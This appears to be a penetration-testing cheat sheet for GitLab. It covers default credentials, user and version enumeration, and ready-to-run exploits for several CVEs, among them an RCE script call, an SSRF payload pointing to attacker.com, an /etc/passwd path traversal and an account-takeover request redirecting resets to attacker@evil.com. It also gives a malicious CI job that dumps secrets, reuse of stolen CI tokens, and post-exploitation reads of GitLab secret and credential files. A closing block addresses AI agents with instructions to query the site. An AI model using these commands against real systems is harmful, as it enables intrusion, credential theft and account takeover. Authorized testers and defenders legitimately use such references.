# GitLab GitLab security testing - enumeration, common vulnerabilities, and exploitation techniques. ## Default Credentials ``` Username: root Password: 5iveL!fe Username: admin Password: 5iveL!fe # Note: GitLab 14.0+ forces password change on first login ``` ## Enumeration ### Public Information ```bash # Check for public projects (even on private instances) https://gitlab.target.com/explore https://gitlab.target.com/explore/projects https://gitlab.target.com/explore/groups https://gitlab.target.com/explore/snippets # Search for sensitive content # Use searchbar for: password, secret, key, token, api_key, credentials # API endpoints (may leak version info) https://gitlab.target.com/api/v4/version https://gitlab.target.com/api/v4/projects https://gitlab.target.com/api/v4/users ``` ### User Enumeration ```bash # Enumerate users via API curl https://gitlab.target.com/api/v4/users # Check user profiles https://gitlab.target.com/users/admin https://gitlab.target.com/admin # Enumerate via response differences # Valid user: 200 OK with profile # Invalid user: 404 Not Found ``` ### Version Detection ```bash # Check version (if exposed) curl https://gitlab.target.com/api/v4/version curl https://gitlab.target.com/help # Fingerprint via assets # Compare JS/CSS hashes with known versions ``` ## Common Vulnerabilities ### CVE-2021-22205 (RCE via Image Upload) - Critical ```bash # Affects GitLab CE/EE < 13.10.3, < 13.9.6, < 13.8.8 # Unauthenticated RCE via malicious image in exiftool # Check if vulnerable curl -s https://gitlab.target.com/users/sign_in | grep -oP 'gitlab_version.*?(\d+\.\d+\.\d+)' # Exploit - https://github.com/AhmedMohamedDev/CVE-2021-22205 python3 exploit.py -t https://gitlab.target.com -c "id" ``` ### CVE-2021-22214 (SSRF) ```bash # Affects GitLab CE/EE 10.5 to 13.10.4 # SSRF via CI lint API curl -X POST "https://gitlab.target.com/api/v4/ci/lint" \ -H "Content-Type: application/json" \ -d '{"content": "include:\n remote: http://attacker.com/evil.yml"}' ``` ### CVE-2023-2825 (Path Traversal) ```bash # Affects GitLab CE/EE 16.0 # Unauthenticated path traversal to read files curl "https://gitlab.target.com/uploads/-/system/personal_snippet/1/secret/../../../../../../../../etc/passwd" ``` ### CVE-2023-7028 (Account Takeover) ```bash # Affects GitLab CE/EE < 16.5.6, < 16.6.4, < 16.7.2 # Password reset to attacker-controlled email # Exploit via duplicate email parameter POST /users/password HTTP/1.1 user[email]=victim@target.com&user[email]=attacker@evil.com ``` ## CI/CD Pipeline Exploitation ### Secrets in CI Variables ```yaml # .gitlab-ci.yml - Check for exposed secrets # Variables often visible in job logs if not masked script: - echo $CI_JOB_TOKEN # May have repo access - echo $PRIVATE_TOKEN # If misconfigured - printenv # Dump all variables ``` ### Token Abuse ```bash # CI_JOB_TOKEN has temporary access to: # - Clone repositories in the same group # - Push to container registry # - Access package registry # Use stolen CI_JOB_TOKEN git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.target.com/group/repo.git # Access container registry docker login -u gitlab-ci-token -p ${CI_JOB_TOKEN} registry.gitlab.target.com ``` ### Runner Exploitation ```bash # If you can modify .gitlab-ci.yml in any repo: # 1. Shared runners may access other project secrets # 2. Shell executors run as gitlab-runner user # 3. Docker executors may allow container escape # Malicious CI job stages: - exploit exploit: stage: exploit script: - cat /etc/passwd - env - ls -la /home/gitlab-runner/ ``` ## GraphQL API Testing ```bash # Introspection query curl -X POST https://gitlab.target.com/api/graphql \ -H "Content-Type: application/json" \ -d '{"query": "{ __schema { types { name } } }"}' # Query current user curl -X POST https://gitlab.target.com/api/graphql \ -H "Content-Type: application/json" \ -H "Authorization: Bearer TOKEN" \ -d '{"query": "{ currentUser { username email } }"}' ``` ## Post-Exploitation ```bash # If you have access to GitLab server: # Database credentials cat /etc/gitlab/gitlab.rb | grep -i password cat /var/opt/gitlab/gitlab-rails/etc/database.yml # Secrets file (for cookie signing, etc.) cat /etc/gitlab/gitlab-secrets.json # Rails console (as root) gitlab-rails console # Then: User.find_by(username: 'root').password = 'newpassword' # Backup (contains all data) ls /var/opt/gitlab/backups/ ``` ## Tools ```bash # GitLab enumeration # https://github.com/AhmedMohamedDev/gitlab-enum python3 gitlab_enum.py -t https://gitlab.target.com # CI/CD exploitation # https://github.com/AhmedMohamedDev/nord-stream nord-stream -t gitlab -u https://gitlab.target.com -token TOKEN # General nuclei -t http/cves/2021/CVE-2021-22205.yaml -u https://gitlab.target.com ``` ## Related Topics * [CI/CD Security](/enumeration/webservices/ci-cd-security.md) - Pipeline attacks * [SSRF](/enumeration/web/ssrf.md) - GitLab SSRF vulnerabilities * [Supply Chain](/enumeration/web/supply-chain.md) - Code repository attacks --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/enumeration/webservices/gitlab.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.